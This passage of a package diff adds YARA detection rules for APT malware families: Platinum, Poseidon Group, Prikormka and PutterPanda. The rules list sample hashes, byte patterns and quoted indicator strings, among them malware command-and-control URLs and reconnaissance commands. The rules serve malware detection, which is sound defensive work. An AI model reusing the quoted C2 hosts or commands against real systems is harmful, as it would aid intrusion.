+last_modified = "2016-04-12"
+strings:
+$str1 = "++[%s^^unknown^^%s]++"
+$str2 = "vtfs43/emm"
+$str3 = {33 C9 39 4C 24 08 7E 10 8B 44 24 04 03 C1 80 00 08 41 3B 4C 24 08 7C F0 C3}
+condition:
+$str1 and $str2 and $str3
+}
+rule Trojan_Win32_Plapiio : Platinum
+{
+meta:
+author = "Microsoft"
+description = "JPin backdoor"
+original_sample_sha1 = "3119de80088c52bd8097394092847cd984606c88"
+unpacked_sample_sha1 = "3acb8fe2a5eb3478b4553907a571b6614eb5455c"
+activity_group = "Platinum"
+version = "1.0"
+last_modified = "2016-04-12"
+strings:
+$str1 = "ServiceMain"
+$str2 = "Startup"
+$str3 = {C6 45 ?? 68 C6 45 ?? 4D C6 45 ?? 53 C6 45 ?? 56 C6 45 ?? 6D C6 45 ?? 6D}
+condition:
+$str1 and $str2 and $str3
+}
+rule Trojan_Win32_Plabit : Platinum
+{
+meta:
+author = "Microsoft" description = "Installer component" sample_sha1 = "6d1169775a552230302131f9385135d385efd166" activity_group = "Platinum" version = "1.0"
+last_modified = "2016-04-12"
+strings:
+$str1 = {4b D3 91 49 A1 80 91 42 83 B6 33 28 36 6B 90 97}
+$str2 = "GetInstanceW"
+$str3 = {8B D0 83 E2 1F 8A 14 0A 30 14 30 40 3B 44 24 04 72 EE}
+condition:
+$str1 and $str2 and $str3
+}
+rule Trojan_Win32_Placisc2 : Platinum
+{
+meta:
+author = "Microsoft"
+description = "Dipsind variant"
+original_sample_sha1 = "bf944eb70a382bd77ee5b47548ea9a4969de0527"
+unpacked_sample_sha1 = "d807648ddecc4572c7b04405f496d25700e0be6e"
+activity_group = "Platinum"
+version = "1.0"
+last_modified = "2016-04-12"
+strings:
+$str1 = {76 16 8B D0 83 E2 07 8A 4C 14 24 8A 14 18 32 D1 88 14 18 40 3B C7 72 EA }
+$str2 = "VPLRXZHTU"
+$str3 = "%d) Command:%s"
+$str4 = {0D 0A 2D 2D 2D 2D 2D 09 2D 2D 2D 2D 2D 2D 0D 0A}
+condition:
+$str1 and $str2 and $str3 and $str4
+}
+rule Trojan_Win32_Placisc3 : Platinum
+{
+meta:
+author = "Microsoft"
+description = "Dipsind variant"
+original_sample_sha1 = "1b542dd0dacfcd4200879221709f5fa9683cdcda"
+unpacked_sample_sha1 = "bbd4992ee3f3a3267732151636359cf94fb4575d"
+activity_group = "Platinum"
+version = "1.0"
+last_modified = "2016-04-12"
+strings:
+$str1 = {BA 6E 00 00 00 66 89 95 ?? ?? FF FF B8 73 00 00 00 66 89 85 ?? ?? FF FF B9 64 00 00 00 66 89 8D ?? ?? FF FF BA 65 00 00 00 66 89 95 ?? ?? FF FF B8 6C 00 00 00}
+$str2 = "VPLRXZHTU"
+$str3 = {8B 44 24 ?? 8A 04 01 41 32 C2 3B CF 7C F2 88 03}
+condition:
+$str1 and $str2 and $str3
+}
+rule Trojan_Win32_Placisc4 : Platinum
+{
+meta:
+author = "Microsoft"
+description = "Installer for Dipsind variant"
+original_sample_sha1 = "3d17828632e8ff1560f6094703ece5433bc69586"
+unpacked_sample_sha1 = "2abb8e1e9cac24be474e4955c63108ff86d1a034"
+activity_group = "Platinum"
+version = "1.0"
+last_modified = "2016-04-12"
+strings:
+$str1 = {8D 71 01 8B C6 99 BB 0A 00 00 00 F7 FB 0F BE D2 0F BE 04 39 2B C2 88 04 39 84 C0 74 0A}
+$str2 = {6A 04 68 00 20 00 00 68 00 00 40 00 6A 00 FF D5}
+$str3 = {C6 44 24 ?? 64 C6 44 24 ?? 6F C6 44 24 ?? 67 C6 44 24 ?? 32 C6 44 24 ?? 6A}
+condition:
+$str1 and $str2 and $str3
+}
+rule Trojan_Win32_Plakpers : Platinum
+{
+meta:
+author = "Microsoft"
+description = "Injector / loader component"
+original_sample_sha1 = "fa083d744d278c6f4865f095cfd2feabee558056"
+unpacked_sample_sha1 = "3a678b5c9c46b5b87bfcb18306ed50fadfc6372e"
+activity_group = "Platinum"
+version = "1.0"
+last_modified = "2016-04-12"
+strings:
+$str1 = "MyFileMappingObject"
+$str2 = "[%.3u] %s %s %s [%s:" wide
+$str3 = "%s\\{%s}\\%s" wide
+condition:
+$str1 and $str2 and $str3
+}
+rule Trojan_Win32_Plainst2 : Platinum
+{
+meta:
+author = "Microsoft"
+description = "Zc tool"
+original_sample_sha1 = "3f2ce812c38ff5ac3d813394291a5867e2cddcf2"
+unpacked_sample_sha1 = "88ff852b1b8077ad5a19cc438afb2402462fbd1a"
+activity_group = "Platinum"
+version = "1.0"
+last_modified = "2016-04-12"
+strings:
+$str1 = "Connected [%s:%d]..."
+$str2 = "reuse possible: %c"
+$str3 = "] => %d%%\x0a"
+condition:
+$str1 and $str2 and $str3
+}
+rule Trojan_Win32_Plakpeer : Platinum
+{
+meta:
+author = "Microsoft"
+description = "Zc tool v2"
+original_sample_sha1 = "2155c20483528377b5e3fde004bb604198463d29"
+unpacked_sample_sha1 = "dc991ef598825daabd9e70bac92c79154363bab2"
+activity_group = "Platinum"
+version = "1.0"
+last_modified = "2016-04-12"
+strings:
+$str1 = "@@E0020(%d)" wide
+$str2 = /exit.{0,3}@exit.{0,3}new.{0,3}query.{0,3}rcz.{0,3}scz/ wide
+$str3 = "---###---" wide
+$str4 = "---@@@---" wide
+condition:
+$str1 and $str2 and $str3 and $str4
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Poseidon_Group.yar remnux-rules-0.0.4/yara/malware/APT_Poseidon_Group.yar
--- remnux-rules-0.0.3/yara/malware/APT_Poseidon_Group.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Poseidon_Group.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,87 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2016-02-09
+	Identifier: Poseidon Group APT
+*/
+
+rule PoseidonGroup_Malware {
+	meta:
+		description = "Detects Poseidon Group Malware"
+		author = "Florian Roth"
+		reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/"
+		date = "2016-02-09"
+		score = 85
+		hash1 = "337e94119cfad0b3144af81b72ac3b2688a219ffa0bdf23ca56c7a68fbe0aea4"
+		hash2 = "344034c0bf9fcd52883dbc158abf6db687150d40a118d9cd6ebd843e186128d3"
+		hash3 = "432b7f7f7bf94260a58ad720f61d91ba3289bf0a9789fc0c2b7ca900788dae61"
+		hash4 = "8955df76182005a69f19f5421c355f1868efe65d6b9e0145625dceda94b84a47"
+		hash5 = "d090b1d77e91848b1e2f5690b54360bbbd7ef808d017304389b90a0f8423367f"
+		hash6 = "d7c8b47a0d0a9181fb993f17e165d75a6be8cf11812d3baf7cf11d085e21d4fb"
+		hash7 = "ded0ee29af97496f27d810f6c16d78a3031d8c2193d5d2a87355f3e3ca58f9b3"
+	strings:
+		$s1 = "c:\\winnt\\system32\\cmd.exe" fullword ascii
+		$s2 = "c:\\windows\\system32\\cmd.exe" fullword ascii
+		$s3 = "c:\\windows\\command.com" fullword ascii
+		$s4 = "copy \"%s\" \"%s\" /Y" fullword ascii
+		$s5 = "http://%s/files/" fullword ascii
+		$s6 = "\"%s\". %s: \"%s\"." fullword ascii
+		$s7 = "0x0666" fullword ascii
+		$s8 = "----------------This_is_a_boundary$" fullword ascii
+		$s9 = "Server 2012" fullword ascii /* Goodware String - occured 1 times */
+		$s10 = "Server 2008" fullword ascii /* Goodware String - occured 1 times */
+		$s11 = "Server 2003" fullword ascii /* Goodware String - occured 1 times */
+
+		$a1 = "net.exe group \"Domain Admins\" /domain" fullword ascii
+		$a2 = "net.exe group \"Admins. do Dom" fullword ascii
+		$a3 = "(SVRID=%d)" fullword ascii
+		$a4 = "(TG=%d)" fullword ascii
+		$a5 = "(SVR=%s)" fullword ascii
+		$a6 = "Set-Cookie:\\b*{.+?}\\n" fullword wide
+		$a7 = "net.exe localgroup Administradores" fullword ascii
+	condition:
+		( uint16(0) == 0x5a4d and filesize < 650KB and 6 of ($s*) ) or
+		( 4 of ($s*) and 1 of ($a*) )
+}
+
+rule PoseidonGroup_MalDoc_1 {
+	meta:
+		description = "Detects Poseidon Group - Malicious Word Document"
+		author = "Florian Roth"
+		reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/"
+		date = "2016-02-09"
+		score = 80
+		hash = "0983526d7f0640e5765ded6be6c9e64869172a02c20023f8a006396ff358999b"
+	strings:
+		$s1 = "c:\\cmd32dll.exe" fullword ascii
+	condition:
+		uint16(0) == 0xcfd0 and filesize < 500KB and all of them
+}
+
+rule PoseidonGroup_MalDoc_2 {
+	meta:
+		description = "Detects Poseidon Group - Malicious Word Document"
+		author = "Florian Roth"
+		reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/"
+		date = "2016-02-09"
+		score = 70
+		hash1 = "3e4cacab0ff950da1c6a1c640fe6cf5555b99e36d4e1cf5c45f04a2048f7620c"
+		hash2 = "1f77475d7740eb0c5802746d63e93218f16a7a19f616e8fddcbff07983b851af"
+		hash3 = "f028ee20363d3a17d30175508bbc4738dd8e245a94bfb200219a40464dd09b3a"
+		hash4 = "ec309300c950936a1b9f900aa30630b33723c42240ca4db978f2ca5e0f97afed"
+		hash5 = "27449198542fed64c23f583617908c8648fa4b4633bacd224f97e7f5d8b18778"
+		hash6 = "1e62629dae05bf7ee3fe1346faa60e6791c61f92dd921daa5ce2bdce2e9d4216"
+	strings:
+		$s0 = "{\\*\\generator Msftedit 5.41." ascii
+		$s1 = "Attachment 1: Complete Professional Background" ascii
+		$s2 = "E-mail:  \\cf1\\ul\\f1"
+		$s3 = "Education:\\par" ascii
+		$s5 = "@gmail.com" ascii
+	condition:
+		uint32(0) == 0x74725c7b and filesize < 500KB and 3 of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Prikormka.yar remnux-rules-0.0.4/yara/malware/APT_Prikormka.yar
--- remnux-rules-0.0.3/yara/malware/APT_Prikormka.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Prikormka.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,141 @@
+// Operation Groundbait yara rules
+// For feedback or questions contact us at: github@eset.com
+// https://github.com/eset/malware-ioc/
+//
+// These yara rules are provided to the community under the two-clause BSD
+// license as follows:
+//
+// Copyright (c) 2016, ESET
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions are met:
+//
+// 1. Redistributions of source code must retain the above copyright notice, this
+// list of conditions and the following disclaimer.
+//
+// 2. Redistributions in binary form must reproduce the above copyright notice,
+// this list of conditions and the following disclaimer in the documentation
+// and/or other materials provided with the distribution.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+// DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+// FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+// DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+// CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+// OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+//
+
+rule PrikormkaDropper
+{
+    strings:
+        $mz = { 4D 5A }
+
+        $kd1 = "KDSTORAGE" wide
+        $kd2 = "KDSTORAGE_64" wide
+        $kd3 = "KDRUNDRV32" wide
+        $kd4 = "KDRAR" wide
+
+        $bin1 = {69 65 04 15 00 14 1E 4A 16 42 08 6C 21 61 24 0F}
+        $bin2 = {76 6F 05 04 16 1B 0D 5E 0D 42 08 6C 20 45 18 16}
+        $bin3 = {4D 00 4D 00 43 00 00 00 67 00 75 00 69 00 64 00 56 00 47 00 41 00 00 00 5F 00 73 00 76 00 67 00}
+
+        $inj1 = "?AVCinj2008Dlg@@" ascii
+        $inj2 = "?AVCinj2008App@@" ascii
+    condition:
+        ($mz at 0) and ((any of ($bin*)) or (3 of ($kd*)) or (all of ($inj*)))
+}
+
+rule PrikormkaModule
+{
+    strings:
+        $mz = { 4D 5A }
+
+        // binary
+        $str1 = {6D 70 2E 64 6C 6C 00 53 74 61 72 74 69 6E 67 00}
+        $str2 = {68 6C 70 75 63 74 66 2E 64 6C 6C 00 43 79 63 6C 65}
+        $str3 = {00 6B 6C 2E 64 6C 6C 00 53 74 61 72 74 69 6E 67 00}
+        $str4 = {69 6F 6D 75 73 2E 64 6C 6C 00 53 74 61 72 74 69 6E 67}
+        $str5 = {61 74 69 6D 6C 2E 64 6C 6C 00 4B 69 63 6B 49 6E 50 6F 69 6E 74}
+        $str6 = {73 6E 6D 2E 64 6C 6C 00 47 65 74 52 65 61 64 79 46 6F 72 44 65 61 64}
+        $str7 = {73 63 72 73 68 2E 64 6C 6C 00 47 65 74 52 65 61 64 79 46 6F 72 44 65 61 64}
+
+        // encrypted
+        $str8 = {50 52 55 5C 17 51 58 17 5E 4A}
+        $str9 = {60 4A 55 55 4E 53 58 4B 17 52 57 17 5E 4A}
+        $str10 = {55 52 5D 4E 5B 4A 5D 17 51 58 17 5E 4A}
+        $str11 = {60 4A 55 55 4E 61 17 51 58 17 5E 4A}
+        $str12 = {39 5D 17 1D 1C 0A 3C 57 59 3B 1C 1E 57 58 4C 54 0F}
+
+        // mutex
+        $str13 = "ZxWinDeffContex" ascii wide
+        $str14 = "Paramore756Contex43" wide
+        $str15 = "Zw_&one@ldrContext43" wide
+
+        // other
+        $str16 = "A95BL765MNG2GPRS"
+
+        // dll names
+        $str17 = "helpldr.dll" wide fullword
+        $str18 = "swma.dll" wide fullword
+        $str19 = "iomus.dll" wide fullword
+        $str20 = "atiml.dll"  wide fullword
+        $str21 = "hlpuctf.dll" wide fullword
+        $str22 = "hauthuid.dll" ascii wide fullword
+
+        // rbcon
+        $str23 = "[roboconid][%s]" ascii fullword
+        $str24 = "[objectset][%s]" ascii fullword
+        $str25 = "rbcon.ini" wide fullword
+
+        // files and logs
+        $str26 = "%s%02d.%02d.%02d_%02d.%02d.%02d.skw" ascii fullword
+        $str27 = "%02d.%02d.%02d_%02d.%02d.%02d.%02d.rem" wide fullword
+
+        // pdb strings
+        $str28 = ":\\!PROJECTS!\\Mina\\2015\\" ascii
+        $str29 = "\\PZZ\\RMO\\" ascii
+        $str30 = ":\\work\\PZZ" ascii
+        $str31 = "C:\\Users\\mlk\\" ascii
+        $str32 = ":\\W o r k S p a c e\\" ascii
+        $str33 = "D:\\My\\Projects_All\\2015\\" ascii
+        $str34 = "\\TOOLS PZZ\\Bezzahod\\" ascii
+
+    condition:
+        ($mz at 0) and (any of ($str*))
+}
+
+rule PrikormkaEarlyVersion
+{
+    strings:
+        $mz = { 4D 5A }
+
+        $str36 = "IntelRestore" ascii fullword
+        $str37 = "Resent" wide fullword
+        $str38 = "ocp8.1" wide fullword
+        $str39 = "rsfvxd.dat" ascii fullword
+        $str40 = "tsb386.dat" ascii fullword
+        $str41 = "frmmlg.dat" ascii fullword
+        $str42 = "smdhost.dll" ascii fullword
+        $str43 = "KDLLCFX" wide fullword
+        $str44 = "KDLLRUNDRV" wide fullword
+    condition:
+        ($mz at 0) and (2 of ($str*))
+}
+
+rule Prikormka
+{
+    meta:
+        Author      = "Anton Cherepanov"
+        Date        = "2016/05/10"
+        Description = "Operation Groundbait"
+        Source = "https://github.com/eset/malware-ioc/"
+        Contact = "threatintel@eset.com"
+        License = "BSD 2-Clause"
+    condition:
+        PrikormkaDropper or PrikormkaModule or PrikormkaEarlyVersion
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_putterpanda.yar remnux-rules-0.0.4/yara/malware/APT_putterpanda.yar
--- remnux-rules-0.0.3/yara/malware/APT_putterpanda.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_putterpanda.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,261 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule APT_Malware_PutterPanda_Rel {
+	meta:
+		description = "Detects an APT malware related to PutterPanda"
+		author = "Florian Roth"
+		score = 70
+		reference = "VT Analysis"
+		date = "2015-06-03"
+		hash = "5367e183df155e3133d916f7080ef973f7741d34"
+	strings:
+		$x0 = "app.stream-media.net" fullword ascii /* score: '12.03' */
+		$x1 = "File %s does'nt exist or is forbidden to acess!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '16.035' */
+
+		$s6 = "GetProcessAddresss of pHttpQueryInfoA Failed!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '32.02' */
+		$s7 = "Connect %s error!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '16.04' */
+		$s9 = "Download file %s successfully!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '14.03' */
+		$s10 = "index.tmp" fullword ascii /* score: '14.03' */
+		$s11 = "Execute PE Successfully" fullword ascii /* PEStudio Blacklist: strings */ /* score: '13.03' */
+		$s13 = "aa/22/success.xml" fullword ascii /* score: '12.005' */
+		$s16 = "aa/22/index.asp" fullword ascii /* score: '11.02' */
+		$s18 = "File %s a Non-Pe File" fullword ascii /* score: '8.04' */
+		$s19 = "SendRequset error!" fullword ascii /* score: '8.04' */
+		$s20 = "filelist[%d]=%s" fullword ascii /* score: '7.015' */
+	condition:
+		( uint16(0) == 0x5a4d and 1 of ($x*) ) or ( 4 of ($s*) )
+}
+
+
+rule APT_Malware_PutterPanda_Rel_2 {
+	meta:
+		description = "APT Malware related to PutterPanda Group"
+		author = "Florian Roth"
+		score = 70
+		reference = "VT Analysis"
+		date = "2015-06-03"
+		hash = "f97e01ee04970d1fc4d988a9e9f0f223ef2a6381"
+	strings:
+		$s0 = "http://update.konamidata.com/test/zl/sophos/td/result/rz.dat?" fullword ascii /* PEStudio Blacklist: strings */ /* score: '28.01' */
+		$s1 = "http://update.konamidata.com/test/zl/sophos/td/index.dat?" fullword ascii /* PEStudio Blacklist: strings */ /* score: '28.01' */
+		$s2 = "Mozilla/4.0 (Compatible; MSIE 6.0;)" fullword ascii /* PEStudio Blacklist: agent */ /* score: '20.03' */
+		$s3 = "Internet connect error:%d" fullword ascii /* PEStudio Blacklist: strings */ /* score: '14.035' */
+		$s4 = "Proxy-Authorization:Basic" fullword ascii /* PEStudio Blacklist: strings */ /* score: '14.02' */
+		$s5 = "HttpQueryInfo failed:%d" fullword ascii /* PEStudio Blacklist: strings */ /* score: '13.015' */
+		$s6 = "read file error:%d" fullword ascii /* score: '11.04' */
+		$s7 = "downdll.dll" fullword ascii /* score: '11.025' */
+		$s8 = "rz.dat" fullword ascii /* score: '10.005' */
+		$s9 = "Invalid url" fullword ascii /* PEStudio Blacklist: strings */ /* score: '9.03' */
+		$s10 = "Create file failed" fullword ascii /* score: '8.045' */
+		$s11 = "myAgent" fullword ascii /* score: '8.025' */
+		$s12 = "%s%s%d%d" fullword ascii /* score: '8.005' */
+		$s13 = "down file success" fullword ascii /* score: '7.035' */
+		$s15 = "error!" fullword ascii /* score: '6.04' */
+		$s18 = "Avaliable data:%u bytes" fullword ascii /* score: '5.025' */
+	condition:
+		uint16(0) == 0x5a4d and 6 of them
+}
+
+rule APT_Malware_PutterPanda_PSAPI {
+	meta:
+		description = "Detects a malware related to Putter Panda"
+		author = "Florian Roth"
+		score = 70
+		reference = "VT Analysis"
+		date = "2015-06-03"
+		hash = "f93a7945a33145bb6c106a51f08d8f44eab1cdf5"
+	strings:
+		$s0 = "LOADER ERROR" fullword ascii /* PEStudio Blacklist: strings */ /* score: '12.03' */
+		$s1 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii /* PEStudio Blacklist: strings */ /* score: '8.045' */
+		$s2 = "psapi.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 54 times */
+		$s3 = "urlmon.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 471 times */
+		$s4 = "WinHttpGetProxyForUrl" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 179 times */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 300KB and all of them
+}
+
+rule APT_Malware_PutterPanda_WUAUCLT {
+	meta:
+		description = "Detects a malware related to Putter Panda"
+		author = "Florian Roth"
+		score = 70
+		reference = "VT Analysis"
+		date = "2015-06-03"
+		hash = "fd5ca5a2d444865fa8320337467313e4026b9f78"
+	strings:
+		$x0 = "WUAUCLT.EXE" fullword wide /* PEStudio Blacklist: strings */ /* score: '20.01' */
+		$x1 = "%s\\tmp%d.exe" fullword ascii /* score: '14.01' */	
+		$x2 = "Microsoft Corporation. All rights reserved." fullword wide /* score: '8.04' */
+
+		$s1 = "Microsoft Windows Operating System" fullword wide /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 4 times */
+		$s2 = "InternetQueryOptionA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 166 times */
+		$s3 = "LookupPrivilegeValueA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 336 times */
+		$s4 = "WNetEnumResourceA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 29 times */
+		$s5 = "HttpSendRequestExA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 87 times */
+		$s6 = "PSAPI.DLL" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 420 times */
+		$s7 = "Microsoft(R) Windows(R) Operating System" fullword wide /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 128 times */
+		$s8 = "CreatePipe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 222 times */
+		$s9 = "EnumProcessModules" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 410 times */
+	condition:
+		all of ($x*) or 
+		(1 of ($x*) and all of ($s*) )
+}
+
+rule APT_Malware_PutterPanda_Gen1 {
+	meta:
+		description = "Detects a malware "
+		author = "YarGen Rule Generator"
+		reference = "not set"
+		date = "2015-06-03"
+		super_rule = 1
+		hash0 = "bf1d385e637326a63c4d2f253dc211e6a5436b6a"
+		hash1 = "76459bcbe072f9c29bb9703bc72c7cd46a692796"
+		hash2 = "e105a7a3a011275002aec4b930c722e6a7ef52ad"
+	strings:
+		$s1 = "%s%duserid=%dthreadid=%dgroupid=%d" fullword ascii /* PEStudio Blacklist: strings */ /* score: '22.02' */
+		$s2 = "ssdpsvc.dll" fullword ascii /* score: '11.00' */
+		$s3 = "Fail %s " fullword ascii /* score: '10.04' */
+		$s4 = "%s%dpara1=%dpara2=%dpara3=%d" fullword ascii /* score: '10.01' */
+		$s5 = "LsaServiceInit" fullword ascii /* score: '7.03' */
+		$s6 = "%-8d Fs %-12s Bs " fullword ascii /* score: '5.04' */
+		$s7 = "Microsoft DH SChannel Cryptographic Provider" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5.00' */ /* Goodware String - occured 5 times */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 1000KB and 5 of them
+}
+
+rule Malware_MsUpdater_String_in_EXE {
+	meta:
+		description = "MSUpdater String in Executable"
+		author = "Florian Roth"
+		score = 50
+		reference = "VT Analysis"
+		date = "2015-06-03"
+		hash = "b1a2043b7658af4d4c9395fa77fde18ccaf549bb"
+	strings:
+		$x1 = "msupdate.exe" fullword wide /* PEStudio Blacklist: strings */ /* score: '20.01' */
+		// $x2 = "msupdate" fullword wide /* PEStudio Blacklist: strings */ /* score: '13.01' */
+		$x3 = "msupdater.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '20.02' */
+		$x4 = "msupdater32.exe" fullword ascii
+		$x5 = "msupdater32.exe" fullword wide
+		$x6 = "msupdate.pif" fullword ascii
+
+		$fp1 = "_msupdate_" wide /* False Positive */
+		$fp2 = "_msupdate_" ascii /* False Positive */
+		$fp3 = "/kies" wide
+	condition:
+		uint16(0) == 0x5a4d and filesize < 500KB and ( 1 of ($x*) ) and not ( 1 of ($fp*) ) 
+}
+
+rule APT_Malware_PutterPanda_MsUpdater_3 {
+	meta:
+		description = "Detects Malware related to PutterPanda - MSUpdater"
+		author = "Florian Roth"
+		score = 70
+		reference = "VT Analysis"
+		date = "2015-06-03"
+		hash = "464149ff23f9c7f4ab2f5cadb76a4f41f969bed0"
+	strings:
+		$s0 = "msupdater.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '20.02' */
+		$s1 = "Explorer.exe \"" fullword ascii /* PEStudio Blacklist: strings */ /* score: '16.05' */
+		$s2 = "FAVORITES.DAT" fullword ascii /* score: '11.02' */
+		$s4 = "COMSPEC" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.82' */ /* Goodware String - occured 178 times */
+	condition:
+		uint16(0) == 0x5a4d and 3 of them
+}
+
+rule APT_Malware_PutterPanda_MsUpdater_1 {
+	meta:
+		description = "Detects Malware related to PutterPanda - MSUpdater"
+		author = "Florian Roth"
+		score = 70
+		reference = "VT Analysis"
+		date = "2015-06-03"
+		hash = "b55072b67543f58c096571c841a560c53d72f01a"
+	strings:
+		$x0 = "msupdate.exe" fullword wide /* PEStudio Blacklist: strings */ /* score: '20.01' */
+		$x1 = "msupdate" fullword wide /* PEStudio Blacklist: strings */ /* score: '13.01' */
+
+		$s1 = "Microsoft Corporation. All rights reserved." fullword wide /* score: '8.04' */
+		$s2 = "Automatic Updates" fullword wide /* PEStudio Blacklist: strings */ /* score: '4.98' */ /* Goodware String - occured 22 times */
+		$s3 = "VirtualProtectEx" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.93' */ /* Goodware String - occured 68 times */
+		$s4 = "Invalid parameter" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.93' */ /* Goodware String - occured 69 times */
+		$s5 = "VirtualAllocEx" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.91' */ /* Goodware String - occured 95 times */
+		$s6 = "WriteProcessMemory" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.87' */ /* Goodware String - occured 131 times */
+	condition:
+		( uint16(0) == 0x5a4d and 1 of ($x*) and 4 of ($s*) ) or
+		( 1 of ($x*) and all of ($s*) )
+}
+
+rule APT_Malware_PutterPanda_MsUpdater_2 {
+	meta:
+		description = "Detects Malware related to PutterPanda - MSUpdater"
+		author = "Florian Roth"
+		score = 70
+		reference = "VT Analysis"
+		date = "2015-06-03"
+		hash = "365b5537e3495f8ecfabe2597399b1f1226879b1"
+	strings:
+		$s0 = "winsta0\\default" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.99' */ /* Goodware String - occured 6 times */
+		$s1 = "EXPLORER.EXE" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.98' */ /* Goodware String - occured 22 times */
+		$s2 = "WNetEnumResourceA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.97' */ /* Goodware String - occured 29 times */
+		$s3 = "explorer.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.97' */ /* Goodware String - occured 31 times */
+		$s4 = "CreateProcessAsUserA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.91' */ /* Goodware String - occured 86 times */
+		$s5 = "HttpSendRequestExA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.91' */ /* Goodware String - occured 87 times */
+		$s6 = "HttpEndRequestA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.91' */ /* Goodware String - occured 91 times */
+		$s7 = "GetModuleBaseNameA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.88' */ /* Goodware String - occured 121 times */
+		$s8 = "GetModuleFileNameExA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.86' */ /* Goodware String - occured 144 times */
+		$s9 = "HttpSendRequestA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.85' */ /* Goodware String - occured 154 times */
+		$s10 = "HttpOpenRequestA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.84' */ /* Goodware String - occured 159 times */
+		$s11 = "InternetConnectA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.82' */ /* Goodware String - occured 183 times */
+		$s12 = "Process32Next" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.80' */ /* Goodware String - occured 204 times */
+		$s13 = "Process32First" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.79' */ /* Goodware String - occured 210 times */
+		$s14 = "CreatePipe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.78' */ /* Goodware String - occured 222 times */
+		$s15 = "EnumProcesses" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.73' */ /* Goodware String - occured 273 times */
